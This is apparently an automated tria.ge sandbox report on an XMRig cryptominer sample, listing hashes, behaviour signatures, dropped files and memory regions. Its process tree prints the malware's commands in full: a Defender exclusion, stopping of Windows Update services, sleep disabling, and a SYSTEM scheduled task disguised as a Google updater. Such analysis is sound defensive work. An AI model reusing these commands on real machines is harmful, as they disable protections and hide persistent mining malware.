Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/01/2024, 10:29

General

  • Target

    file.exe

  • Size

    6.3MB

  • MD5

    05a607cfc9ac7c66d4ce77dde0a2e491

  • SHA1

    56101cac6a6d7484b6b131f9dfa6345a9a889423

  • SHA256

    9bee594297039533caa952164d5f121d238d7c4f64cbcb7bd4b50925b66a9bee

  • SHA512

    3c77fe5a61db86b232965a3e2ae6addd9790a193f55d8c5f7ca56a4b4bb7b0431869e1f897557bd6e8995be991db1a6b82c968b8e62d1072dde6816cb347d680

  • SSDEEP

    98304:Eu50YoHGsu/ccnx9xKKPWCLqpcCEQFW7TlfpMarlx+yP/Vc+KOrlzfWmgGi60gMl:TMDu/f9xKWGpcR5lx1RbqSlpigy

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3576
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4520
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4160
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:840
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4548
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4912
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:524
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4840
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3572
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1532
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:3048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2296
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2136
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:4624
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4080
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4720
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:4380
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3980
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2392
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:3068
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:1016
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:416
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:4652
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3276
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:1520
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2016
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:1008

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  6.3MB

                  MD5

                  05a607cfc9ac7c66d4ce77dde0a2e491

                  SHA1

                  56101cac6a6d7484b6b131f9dfa6345a9a889423

                  SHA256

                  9bee594297039533caa952164d5f121d238d7c4f64cbcb7bd4b50925b66a9bee

                  SHA512

                  3c77fe5a61db86b232965a3e2ae6addd9790a193f55d8c5f7ca56a4b4bb7b0431869e1f897557bd6e8995be991db1a6b82c968b8e62d1072dde6816cb347d680

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  a8e8360d573a4ff072dcc6f09d992c88

                  SHA1

                  3446774433ceaf0b400073914facab11b98b6807

                  SHA256

                  bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

                  SHA512

                  4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fekdbi5.sh0.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  3KB

                  MD5

                  00930b40cba79465b7a38ed0449d1449

                  SHA1

                  4b25a89ee28b20ba162f23772ddaf017669092a5

                  SHA256

                  eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                  SHA512

                  cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  4KB

                  MD5

                  bdb25c22d14ec917e30faf353826c5de

                  SHA1

                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                  SHA256

                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                  SHA512

                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b42c70c1dbf0d1d477ec86902db9e986

                  SHA1

                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                  SHA256

                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                  SHA512

                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                • memory/1008-43-0x00007FF65AFD0000-0x00007FF65C06E000-memory.dmp

                  Filesize

                  16.6MB

                • memory/1520-119-0x00007FF62F460000-0x00007FF62F48A000-memory.dmp

                  Filesize

                  168KB

                • memory/1520-115-0x00007FF62F460000-0x00007FF62F48A000-memory.dmp

                  Filesize

                  168KB

                • memory/1532-23-0x00007FFA21DB0000-0x00007FFA22871000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1532-24-0x0000022672B30000-0x0000022672B40000-memory.dmp

                  Filesize

                  64KB

                • memory/1532-25-0x0000022672B30000-0x0000022672B40000-memory.dmp

                  Filesize

                  64KB

                • memory/1532-36-0x0000022672B30000-0x0000022672B40000-memory.dmp

                  Filesize

                  64KB

                • memory/1532-37-0x0000022672B30000-0x0000022672B40000-memory.dmp

                  Filesize

                  64KB

                • memory/1532-39-0x00007FFA21DB0000-0x00007FFA22871000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2016-113-0x0000000000B80000-0x0000000000BA0000-memory.dmp

                  Filesize

                  128KB

                • memory/2016-114-0x00000000019B0000-0x00000000019D0000-memory.dmp

                  Filesize

                  128KB

                • memory/2016-134-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-132-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-130-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-128-0x00000000019D0000-0x00000000019F0000-memory.dmp

                  Filesize

                  128KB

                • memory/2016-127-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-125-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-123-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-121-0x00000000019D0000-0x00000000019F0000-memory.dmp

                  Filesize

                  128KB

                • memory/2016-120-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-118-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2016-116-0x00007FF7CAC10000-0x00007FF7CB3FF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/2296-73-0x0000021FBDF10000-0x0000021FBDF2A000-memory.dmp

                  Filesize

                  104KB

                • memory/2296-72-0x0000021FBDEB0000-0x0000021FBDEBA000-memory.dmp

                  Filesize

                  40KB

                • memory/2296-80-0x00007FFA22360000-0x00007FFA22E21000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2296-47-0x00007FFA22360000-0x00007FFA22E21000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2296-48-0x0000021FBB820000-0x0000021FBB830000-memory.dmp

                  Filesize

                  64KB

                • memory/2296-58-0x00007FF4F4830000-0x00007FF4F4840000-memory.dmp

                  Filesize

                  64KB

                • memory/2296-68-0x0000021FBB800000-0x0000021FBB81C000-memory.dmp

                  Filesize

                  112KB

                • memory/2296-69-0x0000021FBDCA0000-0x0000021FBDD55000-memory.dmp

                  Filesize

                  724KB

                • memory/2296-70-0x0000021FBDD60000-0x0000021FBDD6A000-memory.dmp

                  Filesize

                  40KB

                • memory/2296-71-0x0000021FBDED0000-0x0000021FBDEEC000-memory.dmp

                  Filesize

                  112KB

                • memory/2296-77-0x0000021FBB820000-0x0000021FBB830000-memory.dmp

                  Filesize

                  64KB

                • memory/2296-74-0x0000021FBDEC0000-0x0000021FBDEC8000-memory.dmp

                  Filesize

                  32KB

                • memory/2296-75-0x0000021FBDEF0000-0x0000021FBDEF6000-memory.dmp

                  Filesize

                  24KB

                • memory/2296-76-0x0000021FBDF00000-0x0000021FBDF0A000-memory.dmp

                  Filesize

                  40KB

                • memory/2596-0-0x00007FF603880000-0x00007FF60491E000-memory.dmp

                  Filesize

                  16.6MB

                • memory/3276-85-0x0000020F55780000-0x0000020F55790000-memory.dmp

                  Filesize

                  64KB

                • memory/3276-109-0x00007FFA22360000-0x00007FFA22E21000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3276-107-0x0000020F55780000-0x0000020F55790000-memory.dmp

                  Filesize

                  64KB

                • memory/3276-106-0x00007FF4F2F10000-0x00007FF4F2F20000-memory.dmp

                  Filesize

                  64KB

                • memory/3276-96-0x0000020F55780000-0x0000020F55790000-memory.dmp

                  Filesize

                  64KB

                • memory/3276-84-0x00007FFA22360000-0x00007FFA22E21000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4520-9-0x00000207432E0000-0x0000020743302000-memory.dmp

                  Filesize

                  136KB

                • memory/4520-20-0x00007FFA21D00000-0x00007FFA227C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4520-15-0x00000207431E0000-0x00000207431F0000-memory.dmp

                  Filesize

                  64KB

                • memory/4520-14-0x00007FFA21D00000-0x00007FFA227C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4520-16-0x00000207431E0000-0x00000207431F0000-memory.dmp

                  Filesize

                  64KB

                • memory/4520-17-0x00000207431E0000-0x00000207431F0000-memory.dmp

                  Filesize

                  64KB